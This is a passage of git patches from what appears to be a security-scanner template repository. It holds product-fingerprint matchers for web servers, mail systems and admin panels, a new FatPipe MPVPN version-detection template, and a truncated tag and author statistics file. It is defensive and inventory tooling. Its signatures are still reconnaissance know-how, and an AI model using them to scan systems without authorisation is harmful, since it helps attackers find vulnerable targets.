words: -

    连豆豆pc客户端

    - type: word - condition: and name: vrv-im words: - href="http://im.vrv.cn/server-securitycenter/password/goretrieval.vrv - type: word - condition: and name: vrv-im words: - class="loginusername" value="" placeholder="连豆豆账号/邮箱/手机号 - type: word - condition: and name: vrv-im words: - class="wj-text wj-title">下载信源豆豆

    - type: word - condition: and name: vrv-nac words: - id="modal_delay" @@ -15920,19 +13513,16 @@ requests: - 欢迎登录北信源网络接入控制系统 - type: word - condition: and name: vts-cms words: - errmag - type: word - condition: and name: w3-total-cache words: - - ' @@ -16287,191 +13826,163 @@ requests: - subversion - type: word - condition: and name: webtrust-cert words: - https://cert.webtrust.org/viewseal - type: word - condition: and name: weiphp words: - 本系统由weiphp强力驱动 - type: word - condition: and name: weiphp words: - content="weiphp - type: word - condition: and name: weiphp words: - /css/weiphp.css - type: word - condition: and name: weisha-learningsystem words: - /utility/corescripts/widget.js - type: word - condition: and name: wellcare-health-management-system words: - href="/web/vfyphrmedical">健康档案 - type: word - condition: and name: wellcare-health-management-system words: - www.wellcare.cn - type: word - condition: and part: header name: weonlydo-product words: - - 'Server: weonlydo' + - "Server: weonlydo" - type: word - condition: and part: header name: westell-secure words: - - 'Server: wstl cpe' + - "Server: wstl cpe" - type: word - condition: and name: whatweb words: - -
    + -
    troy serial server
    - type: word - condition: and name: whatweb words: - - network card access password: + - network card access password: - type: word - condition: and name: whfst-cms words: - 武汉富思特 - type: word - condition: and name: whir words: - css/css_whir.css - type: word - condition: and name: whir-ezoffice words: - ezofficeusername - type: word - condition: and name: whir-ezoffice words: - whirrootpath - type: word - condition: and name: whir-ezoffice words: - /defaultroot/js/cookie.js - type: word - condition: and name: whir-flexoffice words: - var flexofficepath="\/flexoffice" - type: word - condition: and name: whmcs words: - powered by please login or register + -
    please login + or register
    - type: word - condition: and name: whtzjkj-erp words: - href="/content/home/tzjlog.ico" - type: word - condition: and name: wildfly-server words: - wildfly project - type: word - condition: and name: willfar-interface-management-tool words: - the wasion software foundation - type: word - condition: and name: willfar-interface-management-tool words: - alt="接口应用管理工具" - type: word - condition: and name: windows-business-server words: - src="images/sbslogo.gif - type: word - condition: and name: windows-business-server words: - href="/remote">remote web workplace - type: word - condition: and part: header name: windriver words: - - 'Server: windriver-webserver' + - "Server: windriver-webserver" - type: word - condition: and part: header name: wing-ftp-server words: - - 'Server: wing ftp server' + - "Server: wing ftp server" - type: word - condition: and name: winiis-isp-access-resource-management-system words: - winisp.gif - type: word - condition: and name: winmail-server words: - amax information technologies inc. - type: word - condition: and name: winmail-server words: - - 'pop3,smtp server: ' + - "pop3,smtp server: " - type: word - condition: and name: winmail-server words: - src="themes/default/images/mail_pic.jpg @@ -16491,7 +14002,6 @@ requests: - pwdplaceholder - type: word - condition: and name: winmail-server words: - winmail mail server @@ -16500,223 +14010,187 @@ requests: condition: and name: winmail-server words: - - '(build ' + - "(build " - background="customer/winmail_bg11.jpg - type: word - condition: and name: winmail-server words: - src="customer/index_winmail_new.gif - type: word - condition: and name: winwebmail words: - winwebmail server - type: word - condition: and name: winwebmail words: - images/owin.css - type: word - condition: and name: winwebmail words: - - type: word - condition: and name: winwebmail words: - type="hidden" name="secex" - type: word - condition: and name: winwebmail words: - href="images\hwem.css" - type: word - condition: and name: wireless-access-point-controller words: - var oemproductname = "mvc_howay6000" - type: word - condition: and name: wireless-access-point-controller words: - From 7d836047ccf1070c26537b19124d36a77e9c0282 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 17:34:00 +0530 Subject: [PATCH 2625/4083] Create fatpipe-mpvpn-detect.yaml --- technologies/fatpipe-mpvpn-detect.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 technologies/fatpipe-mpvpn-detect.yaml diff --git a/technologies/fatpipe-mpvpn-detect.yaml b/technologies/fatpipe-mpvpn-detect.yaml new file mode 100644 index 0000000000..e1f1325320 --- /dev/null +++ b/technologies/fatpipe-mpvpn-detect.yaml @@ -0,0 +1,30 @@ +id: fatpipe-mpvpn-detect + +info: + name: FatPipe MPVPN Detect + author: princechaddha + severity: info + tags: tech,fatpipe + +requests: + - method: GET + path: + - "{{BaseURL}}/fpui/jsp/login.jsp" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "FatPipe MPVPN | Log in" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - '
    ([0-9.a-z]+)<\/h5>' From c5c2ed1919abb9bcb8725a58cae7d9e06ba9834b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 12:05:00 +0000 Subject: [PATCH 2626/4083] Auto Generated Templates Stats [Thu Sep 30 12:05:00 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1599 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 813 insertions(+), 808 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index c0663f1861..78909cc77c 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":731},{"name":"lfi","count":265},{"name":"panel","count":252},{"name":"xss","count":246},{"name":"exposure","count":233},{"name":"wordpress","count":229},{"name":"rce","count":199},{"name":"tech","count":183},{"name":"cve2020","count":164},{"name":"wp-plugin","count":155},{"name":"cve2021","count":130},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"oob","count":55},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":42},{"name":"sqli","count":38},{"name":"ssrf","count":38},{"name":"","count":37},{"name":"cve2016","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":24},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"auth-bypass","count":21},{"name":"generic","count":21},{"name":"aem","count":19},{"name":"cve2014","count":19},{"name":"router","count":19},{"name":"cisco","count":19},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"struts","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"devops","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"manageengine","count":12},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"nginx","count":8},{"name":"rails","count":8},{"name":"files","count":7},{"name":"google","count":7},{"name":"coldfusion","count":7},{"name":"microsoft","count":7},{"name":"cve2009","count":7},{"name":"confluence","count":7},{"name":"ibm","count":7},{"name":"netgear","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"cms","count":7},{"name":"cve2008","count":6},{"name":"citrix","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"solr","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"drupal","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"circarlife","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"deserialization","count":5},{"name":"hp","count":5},{"name":"dedecms","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"vpn","count":4},{"name":"exchange","count":4},{"name":"git","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"moodle","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"crlf","count":4},{"name":"grafana","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"strapi","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"buffalo","count":4},{"name":"resin","count":4},{"name":"wso2","count":4},{"name":"asp","count":4},{"name":"rfi","count":4},{"name":"kibana","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"httpd","count":3},{"name":"zhiyuan","count":3},{"name":"microstrategy","count":3},{"name":"nexus","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"mail","count":3},{"name":"jeesns","count":3},{"name":"oa","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"npm","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"jellyfin","count":3},{"name":"tikiwiki","count":3},{"name":"lfr","count":3},{"name":"hoteldruid","count":3},{"name":"druid","count":3},{"name":"springcloud","count":3},{"name":"opensis","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nacos","count":3},{"name":"itop","count":3},{"name":"r-seenet","count":3},{"name":"targa","count":3},{"name":"ofbiz","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"telerik","count":3},{"name":"bigip","count":3},{"name":"cacti","count":3},{"name":"firebase","count":3},{"name":"linkerd","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"bitrix","count":3},{"name":"prometheus","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"enumeration","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"ecology","count":2},{"name":"kong","count":2},{"name":"bypass","count":2},{"name":"chamilo","count":2},{"name":"cache","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"icewarp","count":2},{"name":"shellshock","count":2},{"name":"cve2005","count":2},{"name":"trixbox","count":2},{"name":"axis","count":2},{"name":"horde","count":2},{"name":"openfire","count":2},{"name":"nagios","count":2},{"name":"huawei","count":2},{"name":"mcafee","count":2},{"name":"prestashop","count":2},{"name":"sharepoint","count":2},{"name":"qcubed","count":2},{"name":"rockmongo","count":2},{"name":"service","count":2},{"name":"axis2","count":2},{"name":"activemq","count":2},{"name":"jboss","count":2},{"name":"mida","count":2},{"name":"idrac","count":2},{"name":"wuzhicms","count":2},{"name":"cve2007","count":2},{"name":"phpcollab","count":2},{"name":"grav","count":2},{"name":"github","count":2},{"name":"nextjs","count":2},{"name":"couchdb","count":2},{"name":"node","count":2},{"name":"natshell","count":2},{"name":"avantfax","count":2},{"name":"sonicwall","count":2},{"name":"backdoor","count":2},{"name":"sitecore","count":2},{"name":"status","count":2},{"name":"db","count":2},{"name":"adminer","count":2},{"name":"plesk","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"nextcloud","count":2},{"name":"prtg","count":2},{"name":"akkadian","count":2},{"name":"sonarqube","count":2},{"name":"aruba","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"ilo","count":2},{"name":"seeyon","count":2},{"name":"commax","count":2},{"name":"splunk","count":2},{"name":"storage","count":2},{"name":"fortios","count":2},{"name":"favicon","count":2},{"name":"frp","count":2},{"name":"bucket","count":2},{"name":"hpe","count":2},{"name":"bruteforce","count":2},{"name":"getsimple","count":2},{"name":"igs","count":2},{"name":"dos","count":2},{"name":"linux","count":2},{"name":"yii","count":2},{"name":"ucmdb","count":2},{"name":"odoo","count":2},{"name":"liferay","count":2},{"name":"xxljob","count":2},{"name":"vrealize","count":2},{"name":"akamai","count":2},{"name":"guacamole","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"totemomail","count":2},{"name":"smb","count":2},{"name":"showdoc","count":2},{"name":"hashicorp","count":2},{"name":"chiyu","count":2},{"name":"netis","count":2},{"name":"pega","count":2},{"name":"emerge","count":2},{"name":"harbor","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"kentico","count":2},{"name":"hjtcloud","count":2},{"name":"netsweeper","count":2},{"name":"ec2","count":2},{"name":"spark","count":2},{"name":"saltstack","count":2},{"name":"paloalto","count":2},{"name":"middleware","count":2},{"name":"hasura","count":2},{"name":"azure","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"globalprotect","count":2},{"name":"wordfence","count":2},{"name":"apos","count":1},{"name":"sgp","count":1},{"name":"oneblog","count":1},{"name":"exposures","count":1},{"name":"expressjs","count":1},{"name":"feifeicms","count":1},{"name":"clickhouse","count":1},{"name":"tidb","count":1},{"name":"chyrp","count":1},{"name":"mautic","count":1},{"name":"nimble","count":1},{"name":"realteo","count":1},{"name":"parentlink","count":1},{"name":"metinfo","count":1},{"name":"sureline","count":1},{"name":"pmb","count":1},{"name":"pulsesecure","count":1},{"name":"zookeeper","count":1},{"name":"imap","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"smartblog","count":1},{"name":"rujjie","count":1},{"name":"tpshop","count":1},{"name":"episerver","count":1},{"name":"lanproxy","count":1},{"name":"ricoh","count":1},{"name":"duomicms","count":1},{"name":"k8s","count":1},{"name":"actuator","count":1},{"name":"servicedesk","count":1},{"name":"tieline","count":1},{"name":"graphql","count":1},{"name":"emby","count":1},{"name":"razor","count":1},{"name":"seacms","count":1},{"name":"whm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"ruby","count":1},{"name":"totaljs","count":1},{"name":"huijietong","count":1},{"name":"cofax","count":1},{"name":"lansweeper","count":1},{"name":"webmin","count":1},{"name":"openemr","count":1},{"name":"weiphp","count":1},{"name":"rmi","count":1},{"name":"goahead","count":1},{"name":"grails","count":1},{"name":"owasp","count":1},{"name":"daybyday","count":1},{"name":"crm","count":1},{"name":"starttls","count":1},{"name":"shoppable","count":1},{"name":"appweb","count":1},{"name":"testrail","count":1},{"name":"mailchimp","count":1},{"name":"pyramid","count":1},{"name":"eyelock","count":1},{"name":"centreon","count":1},{"name":"nifi","count":1},{"name":"postmessage","count":1},{"name":"darkstat","count":1},{"name":"vnc","count":1},{"name":"proftpd","count":1},{"name":"rockethchat","count":1},{"name":"spring","count":1},{"name":"geutebruck","count":1},{"name":"gsoap","count":1},{"name":"magicflow","count":1},{"name":"powercreator","count":1},{"name":"xdcms","count":1},{"name":"shopxo","count":1},{"name":"minimouse","count":1},{"name":"servicenow","count":1},{"name":"discourse","count":1},{"name":"xml","count":1},{"name":"jaspersoft","count":1},{"name":"jmx","count":1},{"name":"ssltls","count":1},{"name":"pcoip","count":1},{"name":"sprintful","count":1},{"name":"cors","count":1},{"name":"expose","count":1},{"name":"listserv","count":1},{"name":"spectracom","count":1},{"name":"elasticsearch","count":1},{"name":"rmc","count":1},{"name":"cse","count":1},{"name":"myvuehelp","count":1},{"name":"selea","count":1},{"name":"upnp","count":1},{"name":"k8","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"skywalking","count":1},{"name":"lotuscms","count":1},{"name":"zcms","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"openerp","count":1},{"name":"avtech","count":1},{"name":"opm","count":1},{"name":"mrtg","count":1},{"name":"javafaces","count":1},{"name":"sage","count":1},{"name":"gotmls","count":1},{"name":"ns","count":1},{"name":"cscart","count":1},{"name":"blackboard","count":1},{"name":"owa","count":1},{"name":"tor","count":1},{"name":"emc","count":1},{"name":"sangfor","count":1},{"name":"clockwatch","count":1},{"name":"bash","count":1},{"name":"rabbitmq","count":1},{"name":"bazarr","count":1},{"name":"spf","count":1},{"name":"dotclear","count":1},{"name":"cyberoam","count":1},{"name":"subrion","count":1},{"name":"mantisbt","count":1},{"name":"cloudinary","count":1},{"name":"geddy","count":1},{"name":"metabase","count":1},{"name":"gateone","count":1},{"name":"sentry","count":1},{"name":"pippoint","count":1},{"name":"portainer","count":1},{"name":"hiawatha","count":1},{"name":"natemail","count":1},{"name":"trane","count":1},{"name":"hadoop","count":1},{"name":"floc","count":1},{"name":"bigbluebutton","count":1},{"name":"octoprint","count":1},{"name":"wavlink","count":1},{"name":"netdata","count":1},{"name":"doh","count":1},{"name":"beanshell","count":1},{"name":"eprints","count":1},{"name":"xmlchart","count":1},{"name":"lancom","count":1},{"name":"avalanche","count":1},{"name":"arl","count":1},{"name":"mongoshake","count":1},{"name":"email","count":1},{"name":"wildfly","count":1},{"name":"olivetti","count":1},{"name":"smartsense","count":1},{"name":"tongda","count":1},{"name":"qsan","count":1},{"name":"dvr","count":1},{"name":"nexusdb","count":1},{"name":"fortigate","count":1},{"name":"tcexam","count":1},{"name":"exponentcms","count":1},{"name":"landrayoa","count":1},{"name":"redhat","count":1},{"name":"webmodule-ee","count":1},{"name":"database","count":1},{"name":"kafdrop","count":1},{"name":"cve2006","count":1},{"name":"moin","count":1},{"name":"bullwark","count":1},{"name":"trilithic","count":1},{"name":"rsyncd","count":1},{"name":"wooyun","count":1},{"name":"asus","count":1},{"name":"jeewms","count":1},{"name":"wing-ftp","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"nordex","count":1},{"name":"zms","count":1},{"name":"dotnet","count":1},{"name":"azkaban","count":1},{"name":"svnserve","count":1},{"name":"haproxy","count":1},{"name":"openrestry","count":1},{"name":"pihole","count":1},{"name":"cloudflare","count":1},{"name":"sar2html","count":1},{"name":"oscommerce","count":1},{"name":"fortinet","count":1},{"name":"plugin","count":1},{"name":"h3c-imc","count":1},{"name":"sarg","count":1},{"name":"lutron","count":1},{"name":"cgi","count":1},{"name":"opensns","count":1},{"name":"solman","count":1},{"name":"webui","count":1},{"name":"spip","count":1},{"name":"fastapi","count":1},{"name":"jenkin","count":1},{"name":"tika","count":1},{"name":"office365","count":1},{"name":"gloo","count":1},{"name":"karel","count":1},{"name":"alibaba","count":1},{"name":"auth","count":1},{"name":"yealink","count":1},{"name":"etherpad","count":1},{"name":"saltapi","count":1},{"name":"heroku","count":1},{"name":"bookstack","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"tracer","count":1},{"name":"tileserver","count":1},{"name":"embedthis","count":1},{"name":"sceditor","count":1},{"name":"javascript","count":1},{"name":"traefik","count":1},{"name":"iceflow","count":1},{"name":"biometrics","count":1},{"name":"springframework","count":1},{"name":"sql","count":1},{"name":"oidc","count":1},{"name":"jsp","count":1},{"name":"kyan","count":1},{"name":"adb","count":1},{"name":"webftp","count":1},{"name":"phpinfo","count":1},{"name":"clusterengine","count":1},{"name":"argussurveillance","count":1},{"name":"cherokee","count":1},{"name":"discord","count":1},{"name":"werkzeug","count":1},{"name":"exacqvision","count":1},{"name":"alerta","count":1},{"name":"wazuh","count":1},{"name":"froxlor","count":1},{"name":"clink-office","count":1},{"name":"wondercms","count":1},{"name":"centos","count":1},{"name":"codeigniter","count":1},{"name":"memcached","count":1},{"name":"lotus","count":1},{"name":"svn","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"chinaunicom","count":1},{"name":"moinmoin","count":1},{"name":"thinkadmin","count":1},{"name":"vidyo","count":1},{"name":"beanstalk","count":1},{"name":"redis","count":1},{"name":"aura","count":1},{"name":"mantis","count":1},{"name":"twitter-server","count":1},{"name":"websphere","count":1},{"name":"luftguitar","count":1},{"name":"viewlinc","count":1},{"name":"announcekit","count":1},{"name":"qdpm","count":1},{"name":"timesheet","count":1},{"name":"fastcgi","count":1},{"name":"yachtcontrol","count":1},{"name":"anchorcms","count":1},{"name":"terraform","count":1},{"name":"node-red-dashboard","count":1},{"name":"aspnuke","count":1},{"name":"acme","count":1},{"name":"xampp","count":1},{"name":"ems","count":1},{"name":"camunda","count":1},{"name":"szhe","count":1},{"name":"sophos","count":1},{"name":"vsphere","count":1},{"name":"htmli","count":1},{"name":"nps","count":1},{"name":"cerebro","count":1},{"name":"rocketchat","count":1},{"name":"phpunit","count":1},{"name":"hiboss","count":1},{"name":"vcenter","count":1},{"name":"mediumish","count":1},{"name":"openstack","count":1},{"name":"ewebs","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"elfinder","count":1},{"name":"glowroot","count":1},{"name":"blue-ocean","count":1},{"name":"synnefo","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"phpfastcache","count":1},{"name":"payara","count":1},{"name":"opensmtpd","count":1},{"name":"pacsone","count":1},{"name":"hortonworks","count":1},{"name":"mpsec","count":1},{"name":"spidercontrol","count":1},{"name":"gstorage","count":1},{"name":"kerbynet","count":1},{"name":"frontpage","count":1},{"name":"salesforce","count":1},{"name":"addpac","count":1},{"name":"vsftpd","count":1},{"name":"openx","count":1},{"name":"landray","count":1},{"name":"ulterius","count":1},{"name":"panasonic","count":1},{"name":"blind","count":1},{"name":"mobileiron","count":1},{"name":"fiori","count":1},{"name":"webadmin","count":1},{"name":"dbeaver","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"csod","count":1},{"name":"tenda","count":1},{"name":"circontrorl","count":1},{"name":"jfrog","count":1},{"name":"etouch","count":1},{"name":"stem","count":1},{"name":"tensorboard","count":1},{"name":"plastic","count":1},{"name":"artica","count":1},{"name":"resourcespace","count":1},{"name":"klog","count":1},{"name":"wmt","count":1},{"name":"logontracer","count":1},{"name":"netmask","count":1},{"name":"gridx","count":1},{"name":"shoretel","count":1},{"name":"nette","count":1},{"name":"elascticsearch","count":1},{"name":"varnish","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"comodo","count":1},{"name":"javamelody","count":1},{"name":"nomad","count":1},{"name":"cobub","count":1},{"name":"flink","count":1},{"name":"mongo","count":1},{"name":"finereport","count":1},{"name":"panos","count":1},{"name":"influxdb","count":1},{"name":"sidekiq","count":1},{"name":"monitorr","count":1},{"name":"fortilogger","count":1},{"name":"tamronos","count":1},{"name":"commscope","count":1},{"name":"graylog","count":1},{"name":"opencast","count":1},{"name":"pgadmin","count":1},{"name":"calendarix","count":1},{"name":"websvn","count":1},{"name":"bedita","count":1},{"name":"smi","count":1},{"name":"drone","count":1},{"name":"monitorix","count":1},{"name":"fortigates","count":1},{"name":"sqlite","count":1},{"name":"burp","count":1},{"name":"pagespeed","count":1},{"name":"ntopng","count":1},{"name":"erp-nc","count":1},{"name":"primetek","count":1},{"name":"phpwiki","count":1},{"name":"ognl","count":1},{"name":"octobercms","count":1},{"name":"scs","count":1},{"name":"zyxel","count":1},{"name":"lighttpd","count":1},{"name":"nc2","count":1},{"name":"omi","count":1},{"name":"couchbase","count":1},{"name":"mara","count":1},{"name":"postgres","count":1},{"name":"craftcms","count":1},{"name":"achecker","count":1},{"name":"plc","count":1},{"name":"domxss","count":1},{"name":"kubeflow","count":1},{"name":"jquery","count":1},{"name":"zenario","count":1},{"name":"empirecms","count":1},{"name":"maccmsv10","count":1},{"name":"robomongo","count":1},{"name":"xiuno","count":1},{"name":"fedora","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"ssl","count":1},{"name":"redwood","count":1},{"name":"zeroshell","count":1},{"name":"lg-nas","count":1},{"name":"woocommerce","count":1},{"name":"turbocrm","count":1},{"name":"zend","count":1},{"name":"dompdf","count":1},{"name":"scimono","count":1},{"name":"codemeter","count":1},{"name":"shiro","count":1},{"name":"gitea","count":1},{"name":"gunicorn","count":1},{"name":"redcap","count":1},{"name":"74cms","count":1},{"name":"opentsdb","count":1},{"name":"interlib","count":1},{"name":"mirai","count":1},{"name":"visionhub","count":1},{"name":"qvisdvr","count":1},{"name":"gilacms","count":1},{"name":"nedi","count":1},{"name":"bolt","count":1},{"name":"solarlog","count":1},{"name":"ecom","count":1},{"name":"chevereto","count":1},{"name":"zm","count":1},{"name":"iptime","count":1},{"name":"concrete","count":1},{"name":"s3","count":1},{"name":"optiLink","count":1},{"name":"dotnetnuke","count":1},{"name":"checkpoint","count":1},{"name":"circontrol","count":1},{"name":"triconsole","count":1},{"name":"viewpoint","count":1},{"name":"phalcon","count":1},{"name":"xunchi","count":1},{"name":"vscode","count":1},{"name":"default","count":1},{"name":"kindeditor","count":1},{"name":"gespage","count":1},{"name":"ghost","count":1},{"name":"nuxeo","count":1},{"name":"diris","count":1},{"name":"mdb","count":1},{"name":"swagger","count":1},{"name":"soar","count":1},{"name":"visualtools","count":1},{"name":"ganglia","count":1},{"name":"keenetic","count":1},{"name":"miscrsoft","count":1},{"name":"st","count":1},{"name":"cockpit","count":1},{"name":"ruckus","count":1},{"name":"linksys","count":1},{"name":"okta","count":1},{"name":"jenzabar","count":1},{"name":"dnssec","count":1},{"name":"expn","count":1},{"name":"esmtp","count":1},{"name":"setup","count":1},{"name":"mysql","count":1},{"name":"timeclock","count":1},{"name":"tjws","count":1},{"name":"wavemaker","count":1},{"name":"processmaker","count":1},{"name":"shopizer","count":1},{"name":"acexy","count":1},{"name":"majordomo2","count":1},{"name":"eyou","count":1},{"name":"graphite","count":1},{"name":"mariadb","count":1},{"name":"gurock","count":1},{"name":"fortiweb","count":1},{"name":"csrf","count":1},{"name":"phpfusion","count":1},{"name":"jitsi","count":1},{"name":"myucms","count":1},{"name":"plone","count":1},{"name":"tectuus","count":1},{"name":"cocoon","count":1},{"name":"linkedin","count":1},{"name":"gitlist","count":1},{"name":"ilo4","count":1},{"name":"simplecrm","count":1},{"name":"wiki","count":1},{"name":"xvr","count":1},{"name":"sourcebans","count":1},{"name":"woocomernce","count":1},{"name":"alertmanager","count":1},{"name":"shopware","count":1},{"name":"socomec","count":1},{"name":"nuuo","count":1},{"name":"glances","count":1},{"name":"labtech","count":1},{"name":"api-manager","count":1},{"name":"sco","count":1},{"name":"zte","count":1},{"name":"rdp","count":1},{"name":"eg","count":1},{"name":"panabit","count":1},{"name":"clockwork","count":1},{"name":"rhymix","count":1},{"name":"bitly","count":1},{"name":"gogs","count":1},{"name":"upload","count":1},{"name":"zzzcms","count":1},{"name":"tapestry","count":1},{"name":"ambari","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"b2evolution","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"zmanda","count":1},{"name":"dvwa","count":1},{"name":"netrc","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":263},{"name":"daffainfo","count":216},{"name":"pdteam","count":196},{"name":"geeknik","count":153},{"name":"dwisiswant0","count":131},{"name":"gy741","count":75},{"name":"pussycat0x","count":68},{"name":"princechaddha","count":61},{"name":"madrobot","count":61},{"name":"0x_akoko","count":42},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"xelkomy","count":4},{"name":"skeltavik","count":3},{"name":"binaryfigments","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"mavericknerd","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"shifacyclewala","count":3},{"name":"0w4ys","count":3},{"name":"tess","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"thomas_from_offensity","count":3},{"name":"unstabl3","count":3},{"name":"vsh00t","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"johnk3r","count":3},{"name":"incogbyte","count":3},{"name":"fyoorer","count":3},{"name":"bing0o","count":2},{"name":"lotusdll","count":2},{"name":"bsysop","count":2},{"name":"x1m_martijn","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"ree4pwn","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"gal 